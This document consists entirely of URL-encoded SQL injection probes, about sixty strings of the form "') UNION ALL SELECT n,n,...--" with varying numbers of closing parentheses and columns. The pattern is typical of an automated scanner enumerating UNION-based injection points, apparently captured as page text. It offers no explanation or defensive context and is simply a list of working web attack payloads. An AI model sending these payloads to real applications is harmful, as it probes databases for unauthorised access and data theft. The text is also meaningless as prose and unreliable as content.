-9896%27%29%20UNION%20ALL%20SELECT%207592%2C7592%2C7592%2C7592%2C7592%2C7592%2C7592%2C7592%2C7592%2C7592%2C7592%2C7592%2C7592%2C7592%2C7592%2C7592%2C7592%2C7592%2C7592%2C7592%2C7592%2C7592%2C7592%2C7592%2C7592%2C7592%2C7592%2C7592%2C7592%2C7592%2C7592%2C7592%2C7592%2C7592%2C7592%2C7592%2C7592%2C7592%2C7592%2C7592%2C7592%2C7592--%20 -4592%27%29%20UNION%20ALL%20SELECT%202447%2C2447%2C2447%2C2447%2C2447%2C2447%2C2447%2C2447%2C2447%2C2447%2C2447%2C2447%2C2447%2C2447%2C2447%2C2447%2C2447%2C2447%2C2447%2C2447%2C2447%2C2447%2C2447%2C2447%2C2447%2C2447%2C2447%2C2447%2C2447%2C2447%2C2447%2C2447%2C2447%2C2447%2C2447%2C2447%2C2447%2C2447%2C2447%2C2447%2C2447%2C2447%2C2447--%20 -2800%27%29%20UNION%20ALL%20SELECT%201875%2C1875%2C1875%2C1875%2C1875%2C1875%2C1875%2C1875%2C1875%2C1875%2C1875%2C1875%2C1875%2C1875%2C1875%2C1875%2C1875%2C1875%2C1875%2C1875%2C1875%2C1875%2C1875%2C1875%2C1875%2C1875%2C1875%2C1875%2C1875%2C1875%2C1875%2C1875%2C1875%2C1875%2C1875%2C1875%2C1875%2C1875%2C1875%2C1875%2C1875%2C1875%2C1875%2C1875--%20 -9184%27%29%20UNION%20ALL%20SELECT%208300%2C8300%2C8300%2C8300%2C8300%2C8300%2C8300%2C8300%2C8300%2C8300%2C8300%2C8300%2C8300%2C8300%2C8300%2C8300%2C8300%2C8300%2C8300%2C8300%2C8300%2C8300%2C8300%2C8300%2C8300%2C8300%2C8300%2C8300%2C8300%2C8300%2C8300%2C8300%2C8300%2C8300%2C8300%2C8300%2C8300%2C8300%2C8300%2C8300%2C8300%2C8300%2C8300%2C8300%2C8300--%20 -1743%27%29%20UNION%20ALL%20SELECT%208586%2C8586%2C8586%2C8586%2C8586%2C8586%2C8586%2C8586%2C8586%2C8586%2C8586%2C8586%2C8586%2C8586%2C8586%2C8586%2C8586%2C8586%2C8586%2C8586%2C8586%2C8586%2C8586%2C8586%2C8586%2C8586%2C8586%2C8586%2C8586%2C8586%2C8586%2C8586%2C8586%2C8586%2C8586%2C8586%2C8586%2C8586%2C8586%2C8586%2C8586%2C8586%2C8586%2C8586%2C8586%2C8586--%20 -1929%27%29%20UNION%20ALL%20SELECT%203344%2C3344%2C3344%2C3344%2C3344%2C3344%2C3344%2C3344%2C3344%2C3344%2C3344%2C3344%2C3344%2C3344%2C3344%2C3344%2C3344%2C3344%2C3344%2C3344%2C3344%2C3344%2C3344%2C3344%2C3344%2C3344%2C3344%2C3344%2C3344%2C3344%2C3344%2C3344%2C3344%2C3344%2C3344%2C3344%2C3344%2C3344%2C3344%2C3344%2C3344%2C3344%2C3344%2C3344%2C3344%2C3344%2C3344--%20 -7948%27%29%20UNION%20ALL%20SELECT%209804%2C9804%2C9804%2C9804%2C9804%2C9804%2C9804%2C9804%2C9804%2C9804%2C9804%2C9804%2C9804%2C9804%2C9804%2C9804%2C9804%2C9804%2C9804%2C9804%2C9804%2C9804%2C9804%2C9804%2C9804%2C9804%2C9804%2C9804%2C9804%2C9804%2C9804%2C9804%2C9804%2C9804%2C9804%2C9804%2C9804%2C9804%2C9804%2C9804%2C9804%2C9804%2C9804%2C9804%2C9804%2C9804%2C9804%2C9804--%20 -8959%27%29%20UNION%20ALL%20SELECT%206510%2C6510%2C6510%2C6510%2C6510%2C6510%2C6510%2C6510%2C6510%2C6510%2C6510%2C6510%2C6510%2C6510%2C6510%2C6510%2C6510%2C6510%2C6510%2C6510%2C6510%2C6510%2C6510%2C6510%2C6510%2C6510%2C6510%2C6510%2C6510%2C6510%2C6510%2C6510%2C6510%2C6510%2C6510%2C6510%2C6510%2C6510%2C6510%2C6510%2C6510%2C6510%2C6510%2C6510%2C6510%2C6510%2C6510%2C6510%2C6510--%20 -7891%27%29%20UNION%20ALL%20SELECT%209167%2C9167%2C9167%2C9167%2C9167%2C9167%2C9167%2C9167%2C9167%2C9167%2C9167%2C9167%2C9167%2C9167%2C9167%2C9167%2C9167%2C9167%2C9167%2C9167%2C9167%2C9167%2C9167%2C9167%2C9167%2C9167%2C9167%2C9167%2C9167%2C9167%2C9167%2C9167%2C9167%2C9167%2C9167%2C9167%2C9167%2C9167%2C9167%2C9167%2C9167%2C9167%2C9167%2C9167%2C9167%2C9167%2C9167%2C9167%2C9167%2C9167--%20 -3130%27%29%29%20UNION%20ALL%20SELECT%201323%2C1323%2C1323%2C1323%2C1323%2C1323%2C1323%2C1323%2C1323%2C1323%2C1323%2C1323%2C1323%2C1323%2C1323%2C1323%2C1323%2C1323%2C1323%2C1323%2C1323%2C1323%2C1323%2C1323%2C1323%2C1323%2C1323%2C1323%2C1323%2C1323%2C1323%2C1323%2C1323%2C1323%2C1323%2C1323%2C1323%2C1323%2C1323%2C1323%2C1323--%20 -3235%27%29%29%20UNION%20ALL%20SELECT%203958%2C3958%2C3958%2C3958%2C3958%2C3958%2C3958%2C3958%2C3958%2C3958%2C3958%2C3958%2C3958%2C3958%2C3958%2C3958%2C3958%2C3958%2C3958%2C3958%2C3958%2C3958%2C3958%2C3958%2C3958%2C3958%2C3958%2C3958%2C3958%2C3958%2C3958%2C3958%2C3958%2C3958%2C3958%2C3958%2C3958%2C3958%2C3958%2C3958%2C3958%2C3958--%20 -8803%27%29%29%20UNION%20ALL%20SELECT%207692%2C7692%2C7692%2C7692%2C7692%2C7692%2C7692%2C7692%2C7692%2C7692%2C7692%2C7692%2C7692%2C7692%2C7692%2C7692%2C7692%2C7692%2C7692%2C7692%2C7692%2C7692%2C7692%2C7692%2C7692%2C7692%2C7692%2C7692%2C7692%2C7692%2C7692%2C7692%2C7692%2C7692%2C7692%2C7692%2C7692%2C7692%2C7692%2C7692%2C7692%2C7692%2C7692--%20 -5187%27%29%29%20UNION%20ALL%20SELECT%202571%2C2571%2C2571%2C2571%2C2571%2C2571%2C2571%2C2571%2C2571%2C2571%2C2571%2C2571%2C2571%2C2571%2C2571%2C2571%2C2571%2C2571%2C2571%2C2571%2C2571%2C2571%2C2571%2C2571%2C2571%2C2571%2C2571%2C2571%2C2571%2C2571%2C2571%2C2571%2C2571%2C2571%2C2571%2C2571%2C2571%2C2571%2C2571%2C2571%2C2571%2C2571%2C2571%2C2571--%20 -5215%27%29%29%20UNION%20ALL%20SELECT%202256%2C2256%2C2256%2C2256%2C2256%2C2256%2C2256%2C2256%2C2256%2C2256%2C2256%2C2256%2C2256%2C2256%2C2256%2C2256%2C2256%2C2256%2C2256%2C2256%2C2256%2C2256%2C2256%2C2256%2C2256%2C2256%2C2256%2C2256%2C2256%2C2256%2C2256%2C2256%2C2256%2C2256%2C2256%2C2256%2C2256%2C2256%2C2256%2C2256%2C2256%2C2256%2C2256%2C2256%2C2256--%20 -5372%27%29%29%20UNION%20ALL%20SELECT%205131%2C5131%2C5131%2C5131%2C5131%2C5131%2C5131%2C5131%2C5131%2C5131%2C5131%2C5131%2C5131%2C5131%2C5131%2C5131%2C5131%2C5131%2C5131%2C5131%2C5131%2C5131%2C5131%2C5131%2C5131%2C5131%2C5131%2C5131%2C5131%2C5131%2C5131%2C5131%2C5131%2C5131%2C5131%2C5131%2C5131%2C5131%2C5131%2C5131%2C5131%2C5131%2C5131%2C5131%2C5131%2C5131--%20 -5963%27%29%29%20UNION%20ALL%20SELECT%207057%2C7057%2C7057%2C7057%2C7057%2C7057%2C7057%2C7057%2C7057%2C7057%2C7057%2C7057%2C7057%2C7057%2C7057%2C7057%2C7057%2C7057%2C7057%2C7057%2C7057%2C7057%2C7057%2C7057%2C7057%2C7057%2C7057%2C7057%2C7057%2C7057%2C7057%2C7057%2C7057%2C7057%2C7057%2C7057%2C7057%2C7057%2C7057%2C7057%2C7057%2C7057%2C7057%2C7057%2C7057%2C7057%2C7057--%20 -9716%27%29%29%20UNION%20ALL%20SELECT%209853%2C9853%2C9853%2C9853%2C9853%2C9853%2C9853%2C9853%2C9853%2C9853%2C9853%2C9853%2C9853%2C9853%2C9853%2C9853%2C9853%2C9853%2C9853%2C9853%2C9853%2C9853%2C9853%2C9853%2C9853%2C9853%2C9853%2C9853%2C9853%2C9853%2C9853%2C9853%2C9853%2C9853%2C9853%2C9853%2C9853%2C9853%2C9853%2C9853%2C9853%2C9853%2C9853%2C9853%2C9853%2C9853%2C9853%2C9853--%20 -6006%27%29%29%20UNION%20ALL%20SELECT%203299%2C3299%2C3299%2C3299%2C3299%2C3299%2C3299%2C3299%2C3299%2C3299%2C3299%2C3299%2C3299%2C3299%2C3299%2C3299%2C3299%2C3299%2C3299%2C3299%2C3299%2C3299%2C3299%2C3299%2C3299%2C3299%2C3299%2C3299%2C3299%2C3299%2C3299%2C3299%2C3299%2C3299%2C3299%2C3299%2C3299%2C3299%2C3299%2C3299%2C3299%2C3299%2C3299%2C3299%2C3299%2C3299%2C3299%2C3299%2C3299--%20 -9401%27%29%29%20UNION%20ALL%20SELECT%202790%2C2790%2C2790%2C2790%2C2790%2C2790%2C2790%2C2790%2C2790%2C2790%2C2790%2C2790%2C2790%2C2790%2C2790%2C2790%2C2790%2C2790%2C2790%2C2790%2C2790%2C2790%2C2790%2C2790%2C2790%2C2790%2C2790%2C2790%2C2790%2C2790%2C2790%2C2790%2C2790%2C2790%2C2790%2C2790%2C2790%2C2790%2C2790%2C2790%2C2790%2C2790%2C2790%2C2790%2C2790%2C2790%2C2790%2C2790%2C2790%2C2790--%20 -5720%27%29%29%29%20UNION%20ALL%20SELECT%205700%2C5700%2C5700%2C5700%2C5700%2C5700%2C5700%2C5700%2C5700%2C5700%2C5700%2C5700%2C5700%2C5700%2C5700%2C5700%2C5700%2C5700%2C5700%2C5700%2C5700%2C5700%2C5700%2C5700%2C5700%2C5700%2C5700%2C5700%2C5700%2C5700%2C5700%2C5700%2C5700%2C5700%2C5700%2C5700%2C5700%2C5700%2C5700%2C5700%2C5700--%20 -9918%27%29%29%29%20UNION%20ALL%20SELECT%206227%2C6227%2C6227%2C6227%2C6227%2C6227%2C6227%2C6227%2C6227%2C6227%2C6227%2C6227%2C6227%2C6227%2C6227%2C6227%2C6227%2C6227%2C6227%2C6227%2C6227%2C6227%2C6227%2C6227%2C6227%2C6227%2C6227%2C6227%2C6227%2C6227%2C6227%2C6227%2C6227%2C6227%2C6227%2C6227%2C6227%2C6227%2C6227%2C6227%2C6227%2C6227--%20 -5091%27%29%29%29%20UNION%20ALL%20SELECT%204138%2C4138%2C4138%2C4138%2C4138%2C4138%2C4138%2C4138%2C4138%2C4138%2C4138%2C4138%2C4138%2C4138%2C4138%2C4138%2C4138%2C4138%2C4138%2C4138%2C4138%2C4138%2C4138%2C4138%2C4138%2C4138%2C4138%2C4138%2C4138%2C4138%2C4138%2C4138%2C4138%2C4138%2C4138%2C4138%2C4138%2C4138%2C4138%2C4138%2C4138%2C4138%2C4138--%20 -8769%27%29%29%29%20UNION%20ALL%20SELECT%202471%2C2471%2C2471%2C2471%2C2471%2C2471%2C2471%2C2471%2C2471%2C2471%2C2471%2C2471%2C2471%2C2471%2C2471%2C2471%2C2471%2C2471%2C2471%2C2471%2C2471%2C2471%2C2471%2C2471%2C2471%2C2471%2C2471%2C2471%2C2471%2C2471%2C2471%2C2471%2C2471%2C2471%2C2471%2C2471%2C2471%2C2471%2C2471%2C2471%2C2471%2C2471%2C2471%2C2471--%20 -8765%27%29%29%29%20UNION%20ALL%20SELECT%201164%2C1164%2C1164%2C1164%2C1164%2C1164%2C1164%2C1164%2C1164%2C1164%2C1164%2C1164%2C1164%2C1164%2C1164%2C1164%2C1164%2C1164%2C1164%2C1164%2C1164%2C1164%2C1164%2C1164%2C1164%2C1164%2C1164%2C1164%2C1164%2C1164%2C1164%2C1164%2C1164%2C1164%2C1164%2C1164%2C1164%2C1164%2C1164%2C1164%2C1164%2C1164%2C1164%2C1164%2C1164--%20 -9937%27%29%29%29%20UNION%20ALL%20SELECT%203106%2C3106%2C3106%2C3106%2C3106%2C3106%2C3106%2C3106%2C3106%2C3106%2C3106%2C3106%2C3106%2C3106%2C3106%2C3106%2C3106%2C3106%2C3106%2C3106%2C3106%2C3106%2C3106%2C3106%2C3106%2C3106%2C3106%2C3106%2C3106%2C3106%2C3106%2C3106%2C3106%2C3106%2C3106%2C3106%2C3106%2C3106%2C3106%2C3106%2C3106%2C3106%2C3106%2C3106%2C3106%2C3106--%20 -4505%27%29%29%29%20UNION%20ALL%20SELECT%209669%2C9669%2C9669%2C9669%2C9669%2C9669%2C9669%2C9669%2C9669%2C9669%2C9669%2C9669%2C9669%2C9669%2C9669%2C9669%2C9669%2C9669%2C9669%2C9669%2C9669%2C9669%2C9669%2C9669%2C9669%2C9669%2C9669%2C9669%2C9669%2C9669%2C9669%2C9669%2C9669%2C9669%2C9669%2C9669%2C9669%2C9669%2C9669%2C9669%2C9669%2C9669%2C9669%2C9669%2C9669%2C9669%2C9669--%20 -1496%27%29%29%29%20UNION%20ALL%20SELECT%203387%2C3387%2C3387%2C3387%2C3387%2C3387%2C3387%2C3387%2C3387%2C3387%2C3387%2C3387%2C3387%2C3387%2C3387%2C3387%2C3387%2C3387%2C3387%2C3387%2C3387%2C3387%2C3387%2C3387%2C3387%2C3387%2C3387%2C3387%2C3387%2C3387%2C3387%2C3387%2C3387%2C3387%2C3387%2C3387%2C3387%2C3387%2C3387%2C3387%2C3387%2C3387%2C3387%2C3387%2C3387%2C3387%2C3387%2C3387--%20 -9170%27%29%29%29%20UNION%20ALL%20SELECT%208855%2C8855%2C8855%2C8855%2C8855%2C8855%2C8855%2C8855%2C8855%2C8855%2C8855%2C8855%2C8855%2C8855%2C8855%2C8855%2C8855%2C8855%2C8855%2C8855%2C8855%2C8855%2C8855%2C8855%2C8855%2C8855%2C8855%2C8855%2C8855%2C8855%2C8855%2C8855%2C8855%2C8855%2C8855%2C8855%2C8855%2C8855%2C8855%2C8855%2C8855%2C8855%2C8855%2C8855%2C8855%2C8855%2C8855%2C8855%2C8855--%20 -2114%27%29%29%29%20UNION%20ALL%20SELECT%207065%2C7065%2C7065%2C7065%2C7065%2C7065%2C7065%2C7065%2C7065%2C7065%2C7065%2C7065%2C7065%2C7065%2C7065%2C7065%2C7065%2C7065%2C7065%2C7065%2C7065%2C7065%2C7065%2C7065%2C7065%2C7065%2C7065%2C7065%2C7065%2C7065%2C7065%2C7065%2C7065%2C7065%2C7065%2C7065%2C7065%2C7065%2C7065%2C7065%2C7065%2C7065%2C7065%2C7065%2C7065%2C7065%2C7065%2C7065%2C7065%2C7065--%20 -2340%27%20UNION%20ALL%20SELECT%201969%2C1969%2C1969%2C1969%2C1969%2C1969%2C1969%2C1969%2C1969%2C1969%2C1969%2C1969%2C1969%2C1969%2C1969%2C1969%2C1969%2C1969%2C1969%2C1969%2C1969%2C1969%2C1969%2C1969%2C1969%2C1969%2C1969%2C1969%2C1969%2C1969%2C1969%2C1969%2C1969%2C1969%2C1969%2C1969%2C1969%2C1969%2C1969%2C1969%2C1969--%20 -8261%27%20UNION%20ALL%20SELECT%208903%2C8903%2C8903%2C8903%2C8903%2C8903%2C8903%2C8903%2C8903%2C8903%2C8903%2C8903%2C8903%2C8903%2C8903%2C8903%2C8903%2C8903%2C8903%2C8903%2C8903%2C8903%2C8903%2C8903%2C8903%2C8903%2C8903%2C8903%2C8903%2C8903%2C8903%2C8903%2C8903%2C8903%2C8903%2C8903%2C8903%2C8903%2C8903%2C8903%2C8903%2C8903--%20 -1635%27%20UNION%20ALL%20SELECT%205432%2C5432%2C5432%2C5432%2C5432%2C5432%2C5432%2C5432%2C5432%2C5432%2C5432%2C5432%2C5432%2C5432%2C5432%2C5432%2C5432%2C5432%2C5432%2C5432%2C5432%2C5432%2C5432%2C5432%2C5432%2C5432%2C5432%2C5432%2C5432%2C5432%2C5432%2C5432%2C5432%2C5432%2C5432%2C5432%2C5432%2C5432%2C5432%2C5432%2C5432%2C5432%2C5432--%20 -2334%27%20UNION%20ALL%20SELECT%209465%2C9465%2C9465%2C9465%2C9465%2C9465%2C9465%2C9465%2C9465%2C9465%2C9465%2C9465%2C9465%2C9465%2C9465%2C9465%2C9465%2C9465%2C9465%2C9465%2C9465%2C9465%2C9465%2C9465%2C9465%2C9465%2C9465%2C9465%2C9465%2C9465%2C9465%2C9465%2C9465%2C9465%2C9465%2C9465%2C9465%2C9465%2C9465%2C9465%2C9465%2C9465%2C9465%2C9465--%20 -4903%27%20UNION%20ALL%20SELECT%209676%2C9676%2C9676%2C9676%2C9676%2C9676%2C9676%2C9676%2C9676%2C9676%2C9676%2C9676%2C9676%2C9676%2C9676%2C9676%2C9676%2C9676%2C9676%2C9676%2C9676%2C9676%2C9676%2C9676%2C9676%2C9676%2C9676%2C9676%2C9676%2C9676%2C9676%2C9676%2C9676%2C9676%2C9676%2C9676%2C9676%2C9676%2C9676%2C9676%2C9676%2C9676%2C9676%2C9676%2C9676--%20 -4595%27%20UNION%20ALL%20SELECT%208176%2C8176%2C8176%2C8176%2C8176%2C8176%2C8176%2C8176%2C8176%2C8176%2C8176%2C8176%2C8176%2C8176%2C8176%2C8176%2C8176%2C8176%2C8176%2C8176%2C8176%2C8176%2C8176%2C8176%2C8176%2C8176%2C8176%2C8176%2C8176%2C8176%2C8176%2C8176%2C8176%2C8176%2C8176%2C8176%2C8176%2C8176%2C8176%2C8176%2C8176%2C8176%2C8176%2C8176%2C8176%2C8176--%20 -3797%27%20UNION%20ALL%20SELECT%201516%2C1516%2C1516%2C1516%2C1516%2C1516%2C1516%2C1516%2C1516%2C1516%2C1516%2C1516%2C1516%2C1516%2C1516%2C1516%2C1516%2C1516%2C1516%2C1516%2C1516%2C1516%2C1516%2C1516%2C1516%2C1516%2C1516%2C1516%2C1516%2C1516%2C1516%2C1516%2C1516%2C1516%2C1516%2C1516%2C1516%2C1516%2C1516%2C1516%2C1516%2C1516%2C1516%2C1516%2C1516%2C1516%2C1516--%20 -4349%27%20UNION%20ALL%20SELECT%202387%2C2387%2C2387%2C2387%2C2387%2C2387%2C2387%2C2387%2C2387%2C2387%2C2387%2C2387%2C2387%2C2387%2C2387%2C2387%2C2387%2C2387%2C2387%2C2387%2C2387%2C2387%2C2387%2C2387%2C2387%2C2387%2C2387%2C2387%2C2387%2C2387%2C2387%2C2387%2C2387%2C2387%2C2387%2C2387%2C2387%2C2387%2C2387%2C2387%2C2387%2C2387%2C2387%2C2387%2C2387%2C2387%2C2387%2C2387--%20 -5483%27%20UNION%20ALL%20SELECT%204972%2C4972%2C4972%2C4972%2C4972%2C4972%2C4972%2C4972%2C4972%2C4972%2C4972%2C4972%2C4972%2C4972%2C4972%2C4972%2C4972%2C4972%2C4972%2C4972%2C4972%2C4972%2C4972%2C4972%2C4972%2C4972%2C4972%2C4972%2C4972%2C4972%2C4972%2C4972%2C4972%2C4972%2C4972%2C4972%2C4972%2C4972%2C4972%2C4972%2C4972%2C4972%2C4972%2C4972%2C4972%2C4972%2C4972%2C4972%2C4972--%20 -1207%27%20UNION%20ALL%20SELECT%203301%2C3301%2C3301%2C3301%2C3301%2C3301%2C3301%2C3301%2C3301%2C3301%2C3301%2C3301%2C3301%2C3301%2C3301%2C3301%2C3301%2C3301%2C3301%2C3301%2C3301%2C3301%2C3301%2C3301%2C3301%2C3301%2C3301%2C3301%2C3301%2C3301%2C3301%2C3301%2C3301%2C3301%2C3301%2C3301%2C3301%2C3301%2C3301%2C3301%2C3301%2C3301%2C3301%2C3301%2C3301%2C3301%2C3301%2C3301%2C3301%2C3301--%20 -5053%27%29%20UNION%20ALL%20SELECT%201853%2C1853%2C1853%2C1853%2C1853%2C1853%2C1853%2C1853%2C1853%2C1853%2C1853%2C1853%2C1853%2C1853%2C1853%2C1853%2C1853%2C1853%2C1853%2C1853%2C1853%2C1853%2C1853%2C1853%2C1853%2C1853%2C1853%2C1853%2C1853%2C1853%2C1853%2C1853%2C1853%2C1853%2C1853%2C1853%2C1853%2C1853%2C1853%2C1853%2C1853--%20 -6735%27%29%20UNION%20ALL%20SELECT%202749%2C2749%2C2749%2C2749%2C2749%2C2749%2C2749%2C2749%2C2749%2C2749%2C2749%2C2749%2C2749%2C2749%2C2749%2C2749%2C2749%2C2749%2C2749%2C2749%2C2749%2C2749%2C2749%2C2749%2C2749%2C2749%2C2749%2C2749%2C2749%2C2749%2C2749%2C2749%2C2749%2C2749%2C2749%2C2749%2C2749%2C2749%2C2749%2C2749%2C2749%2C2749--%20 -4912%27%29%20UNION%20ALL%20SELECT%205557%2C5557%2C5557%2C5557%2C5557%2C5557%2C5557%2C5557%2C5557%2C5557%2C5557%2C5557%2C5557%2C5557%2C5557%2C5557%2C5557%2C5557%2C5557%2C5557%2C5557%2C5557%2C5557%2C5557%2C5557%2C5557%2C5557%2C5557%2C5557%2C5557%2C5557%2C5557%2C5557%2C5557%2C5557%2C5557%2C5557%2C5557%2C5557%2C5557%2C5557%2C5557%2C5557--%20 -5954%27%29%20UNION%20ALL%20SELECT%206838%2C6838%2C6838%2C6838%2C6838%2C6838%2C6838%2C6838%2C6838%2C6838%2C6838%2C6838%2C6838%2C6838%2C6838%2C6838%2C6838%2C6838%2C6838%2C6838%2C6838%2C6838%2C6838%2C6838%2C6838%2C6838%2C6838%2C6838%2C6838%2C6838%2C6838%2C6838%2C6838%2C6838%2C6838%2C6838%2C6838%2C6838%2C6838%2C6838%2C6838%2C6838%2C6838%2C6838--%20 -4637%27%29%20UNION%20ALL%20SELECT%204571%2C4571%2C4571%2C4571%2C4571%2C4571%2C4571%2C4571%2C4571%2C4571%2C4571%2C4571%2C4571%2C4571%2C4571%2C4571%2C4571%2C4571%2C4571%2C4571%2C4571%2C4571%2C4571%2C4571%2C4571%2C4571%2C4571%2C4571%2C4571%2C4571%2C4571%2C4571%2C4571%2C4571%2C4571%2C4571%2C4571%2C4571%2C4571%2C4571%2C4571%2C4571%2C4571%2C4571%2C4571--%20 -7761%27%29%20UNION%20ALL%20SELECT%201836%2C1836%2C1836%2C1836%2C1836%2C1836%2C1836%2C1836%2C1836%2C1836%2C1836%2C1836%2C1836%2C1836%2C1836%2C1836%2C1836%2C1836%2C1836%2C1836%2C1836%2C1836%2C1836%2C1836%2C1836%2C1836%2C1836%2C1836%2C1836%2C1836%2C1836%2C1836%2C1836%2C1836%2C1836%2C1836%2C1836%2C1836%2C1836%2C1836%2C1836%2C1836%2C1836%2C1836%2C1836%2C1836--%20 -8473%27%29%20UNION%20ALL%20SELECT%206899%2C6899%2C6899%2C6899%2C6899%2C6899%2C6899%2C6899%2C6899%2C6899%2C6899%2C6899%2C6899%2C6899%2C6899%2C6899%2C6899%2C6899%2C6899%2C6899%2C6899%2C6899%2C6899%2C6899%2C6899%2C6899%2C6899%2C6899%2C6899%2C6899%2C6899%2C6899%2C6899%2C6899%2C6899%2C6899%2C6899%2C6899%2C6899%2C6899%2C6899%2C6899%2C6899%2C6899%2C6899%2C6899%2C6899--%20 -2492%27%29%20UNION%20ALL%20SELECT%207407%2C7407%2C7407%2C7407%2C7407%2C7407%2C7407%2C7407%2C7407%2C7407%2C7407%2C7407%2C7407%2C7407%2C7407%2C7407%2C7407%2C7407%2C7407%2C7407%2C7407%2C7407%2C7407%2C7407%2C7407%2C7407%2C7407%2C7407%2C7407%2C7407%2C7407%2C7407%2C7407%2C7407%2C7407%2C7407%2C7407%2C7407%2C7407%2C7407%2C7407%2C7407%2C7407%2C7407%2C7407%2C7407%2C7407%2C7407--%20 -6159%27%29%20UNION%20ALL%20SELECT%208066%2C8066%2C8066%2C8066%2C8066%2C8066%2C8066%2C8066%2C8066%2C8066%2C8066%2C8066%2C8066%2C8066%2C8066%2C8066%2C8066%2C8066%2C8066%2C8066%2C8066%2C8066%2C8066%2C8066%2C8066%2C8066%2C8066%2C8066%2C8066%2C8066%2C8066%2C8066%2C8066%2C8066%2C8066%2C8066%2C8066%2C8066%2C8066%2C8066%2C8066%2C8066%2C8066%2C8066%2C8066%2C8066%2C8066%2C8066%2C8066--%20 -6415%27%29%20UNION%20ALL%20SELECT%204293%2C4293%2C4293%2C4293%2C4293%2C4293%2C4293%2C4293%2C4293%2C4293%2C4293%2C4293%2C4293%2C4293%2C4293%2C4293%2C4293%2C4293%2C4293%2C4293%2C4293%2C4293%2C4293%2C4293%2C4293%2C4293%2C4293%2C4293%2C4293%2C4293%2C4293%2C4293%2C4293%2C4293%2C4293%2C4293%2C4293%2C4293%2C4293%2C4293%2C4293%2C4293%2C4293%2C4293%2C4293%2C4293%2C4293%2C4293%2C4293%2C4293--%20 -1292%27%29%29%20UNION%20ALL%20SELECT%202109%2C2109%2C2109%2C2109%2C2109%2C2109%2C2109%2C2109%2C2109%2C2109%2C2109%2C2109%2C2109%2C2109%2C2109%2C2109%2C2109%2C2109%2C2109%2C2109%2C2109%2C2109%2C2109%2C2109%2C2109%2C2109%2C2109%2C2109%2C2109%2C2109%2C2109%2C2109%2C2109%2C2109%2C2109%2C2109%2C2109%2C2109%2C2109%2C2109%2C2109--%20 -2395%27%29%29%20UNION%20ALL%20SELECT%201882%2C1882%2C1882%2C1882%2C1882%2C1882%2C1882%2C1882%2C1882%2C1882%2C1882%2C1882%2C1882%2C1882%2C1882%2C1882%2C1882%2C1882%2C1882%2C1882%2C1882%2C1882%2C1882%2C1882%2C1882%2C1882%2C1882%2C1882%2C1882%2C1882%2C1882%2C1882%2C1882%2C1882%2C1882%2C1882%2C1882%2C1882%2C1882%2C1882%2C1882%2C1882--%20 -6555%27%29%29%20UNION%20ALL%20SELECT%206423%2C6423%2C6423%2C6423%2C6423%2C6423%2C6423%2C6423%2C6423%2C6423%2C6423%2C6423%2C6423%2C6423%2C6423%2C6423%2C6423%2C6423%2C6423%2C6423%2C6423%2C6423%2C6423%2C6423%2C6423%2C6423%2C6423%2C6423%2C6423%2C6423%2C6423%2C6423%2C6423%2C6423%2C6423%2C6423%2C6423%2C6423%2C6423%2C6423%2C6423%2C6423%2C6423--%20 -8187%27%29%29%20UNION%20ALL%20SELECT%206812%2C6812%2C6812%2C6812%2C6812%2C6812%2C6812%2C6812%2C6812%2C6812%2C6812%2C6812%2C6812%2C6812%2C6812%2C6812%2C6812%2C6812%2C6812%2C6812%2C6812%2C6812%2C6812%2C6812%2C6812%2C6812%2C6812%2C6812%2C6812%2C6812%2C6812%2C6812%2C6812%2C6812%2C6812%2C6812%2C6812%2C6812%2C6812%2C6812%2C6812%2C6812%2C6812%2C6812--%20 -4952%27%29%29%20UNION%20ALL%20SELECT%206969%2C6969%2C6969%2C6969%2C6969%2C6969%2C6969%2C6969%2C6969%2C6969%2C6969%2C6969%2C6969%2C6969%2C6969%2C6969%2C6969%2C6969%2C6969%2C6969%2C6969%2C6969%2C6969%2C6969%2C6969%2C6969%2C6969%2C6969%2C6969%2C6969%2C6969%2C6969%2C6969%2C6969%2C6969%2C6969%2C6969%2C6969%2C6969%2C6969%2C6969%2C6969%2C6969%2C6969%2C6969--%20 -1196%27%29%29%20UNION%20ALL%20SELECT%202530%2C2530%2C2530%2C2530%2C2530%2C2530%2C2530%2C2530%2C2530%2C2530%2C2530%2C2530%2C2530%2C2530%2C2530%2C2530%2C2530%2C2530%2C2530%2C2530%2C2530%2C2530%2C2530%2C2530%2C2530%2C2530%2C2530%2C2530%2C2530%2C2530%2C2530%2C2530%2C2530%2C2530%2C2530%2C2530%2C2530%2C2530%2C2530%2C2530%2C2530%2C2530%2C2530%2C2530%2C2530%2C2530--%20 -1979%27%29%29%20UNION%20ALL%20SELECT%206382%2C6382%2C6382%2C6382%2C6382%2C6382%2C6382%2C6382%2C6382%2C6382%2C6382%2C6382%2C6382%2C6382%2C6382%2C6382%2C6382%2C6382%2C6382%2C6382%2C6382%2C6382%2C6382%2C6382%2C6382%2C6382%2C6382%2C6382%2C6382%2C6382%2C6382%2C6382%2C6382%2C6382%2C6382%2C6382%2C6382%2C6382%2C6382%2C6382%2C6382%2C6382%2C6382%2C6382%2C6382%2C6382%2C6382--%20 -6206%27%29%29%20UNION%20ALL%20SELECT%209427%2C9427%2C9427%2C9427%2C9427%2C9427%2C9427%2C9427%2C9427%2C9427%2C9427%2C9427%2C9427%2C9427%2C9427%2C9427%2C9427%2C9427%2C9427%2C9427%2C9427%2C9427%2C9427%2C9427%2C9427%2C9427%2C9427%2C9427%2C9427%2C9427%2C9427%2C9427%2C9427%2C9427%2C9427%2C9427%2C9427%2C9427%2C9427%2C9427%2C9427%2C9427%2C9427%2C9427%2C9427%2C9427%2C9427%2C9427--%20 -5755%27%29%29%20UNION%20ALL%20SELECT%206108%2C6108%2C6108%2C6108%2C6108%2C6108%2C6108%2C6108%2C6108%2C6108%2C6108%2C6108%2C6108%2C6108%2C6108%2C6108%2C6108%2C6108%2C6108%2C6108%2C6108%2C6108%2C6108%2C6108%2C6108%2C6108%2C6108%2C6108%2C6108%2C6108%2C6108%2C6108%2C6108%2C6108%2C6108%2C6108%2C6108%2C6108%2C6108%2C6108%2C6108%2C6108%2C6108%2C6108%2C6108%2C6108%2C6108%2C6108%2C6108--%20 -3979%27%29%29%20UNION%20ALL%20SELECT%203346%2C3346%2C3346%2C3346%2C3346%2C3346%2C3346%2C3346%2C3346%2C3346%2C3346%2C3346%2C3346%2C3346%2C3346%2C3346%2C3346%2C3346%2C3346%2C3346%2C3346%2C3346%2C3346%2C3346%2C3346%2C3346%2C3346%2C3346%2C3346%2C3346%2C3346%2C3346%2C3346%2C3346%2C3346%2C3346%2C3346%2C3346%2C3346%2C3346%2C3346%2C3346%2C3346%2C3346%2C3346%2C3346%2C3346%2C3346%2C3346%2C3346--%20 